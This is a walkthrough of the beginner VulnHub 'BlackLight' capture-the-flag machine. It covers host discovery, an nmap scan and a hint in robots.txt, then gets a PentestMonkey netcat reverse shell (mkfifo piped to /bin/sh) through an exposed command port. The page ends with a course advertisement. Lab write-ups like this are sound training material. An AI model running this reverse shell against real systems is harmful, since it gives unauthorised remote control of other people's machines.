BlackLight – VulnHub CTF Challenge Walkthrough

Blacklight is a beginner level CTF challenge. The VM is available at VulnHub. This challenge is very easy and short as compared to other VulnHub Challenges.

Import the VM into the Virtualbox and turn on.

Use netdiscover to determine the IP of the machine

sudo netdiscover -i wlan0 -r


Now, edit your “/etc/hosts” file to register this IP into your local DNS.

sudo nano /etc/hosts


Run a full port Nmap Scan.

nmap -p- bl.local


There is a HTTP Server running and an unknown port open. First, Check the HTTP Server.


The source code of the default webpage reveals nothing, let’s check “robots.txt”.


“robots.txt” reveals our first flag plus a hint pointing at the port 9072 that we previously discovered using Nmap. Now, let’s connect to that port using Netcat.

nc -v bl.local 9072


“.help” reveals that we can execute a command in the shell, let’s execute our Netcat reverse shell from PentestMonkey. Start a Netcat listener

nc -nlvp 1234

and then execute the following reverse shell.

.exec `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f`


We got our reverse shell executed.


Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Study Reveals WiFi Protocol Vulnerability Exposing Network Traffic

Microsoft Rolls Out Security Copilot For Swift Incident Response

ChatGPT Vulnerability Exposed Users’ Convos And Payment Details